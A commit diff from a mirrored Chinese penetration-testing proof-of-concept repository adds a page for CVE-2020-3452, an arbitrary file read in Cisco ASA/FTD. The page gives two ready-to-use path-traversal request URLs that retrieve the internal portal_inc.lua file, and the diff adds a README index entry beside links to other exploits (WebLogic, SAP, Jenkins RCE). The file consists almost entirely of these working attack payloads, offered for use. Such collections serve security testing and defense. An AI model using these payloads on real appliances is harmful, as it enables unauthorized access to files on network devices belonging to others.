mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-06-20 01:40:29 +00:00
add CVE-2020-3452:Cisco ASA/FTD 任意文件读取漏洞
This commit is contained in:
parent
dbe366b08f
commit
42e08ab8f6
23
CVE-2020-3452:Cisco_ASAFTD任意文件读取漏洞.md
Normal file
23
CVE-2020-3452:Cisco_ASAFTD任意文件读取漏洞.md
Normal file
@ -0,0 +1,23 @@
|
||||
CVE-2020-3452:Cisco_ASAFTD任意文件读取漏洞
|
||||
|
||||
POC:one:
|
||||
|
||||
```
|
||||
For example to read "/+CSCOE+/portal_inc.lua" file. https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
|
||||
```
|
||||
|
||||
|
||||
|
||||
漏洞复现情况如下:
|
||||
|
||||

|
||||
|
||||
POC:two:
|
||||
|
||||
```
|
||||
https://<domain>/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
|
||||
```
|
||||
|
||||
漏洞复现情况如下:
|
||||
|
||||

|
@ -176,6 +176,7 @@
|
||||
- [CVE-2020-14645-WebLogic 远程代码执行漏洞](https://github.com/Y4er/CVE-2020-14645)|[Weblogic_CVE-2020-14645](https://github.com/DSO-Lab/Weblogic_CVE-2020-14645)
|
||||
- [CVE-2020-6287-SAP NetWeaver AS JAVA 授权问题漏洞-创建用户EXP](https://github.com/duc-nt/CVE-2020-6287-exploit)|[SAP_RECON-PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)](https://github.com/chipik/SAP_RECON)
|
||||
- [CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029-jenkins-rce](https://github.com/orangetw/awesome-jenkins-rce-2019)
|
||||
- [CVE-2020-3452:Cisco ASA/FTD 任意文件读取漏洞](./CVE-2020-3452:Cisco_ASAFTD任意文件读取漏洞.md)
|
||||
|
||||
## <span id="head5"> 提权辅助相关</span>
|
||||
|
||||
|
BIN
img/67.png
Normal file
BIN
img/67.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 387 KiB |
BIN
img/68.png
Normal file
BIN
img/68.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 368 KiB |
Loading…
x
Reference in New Issue
Block a user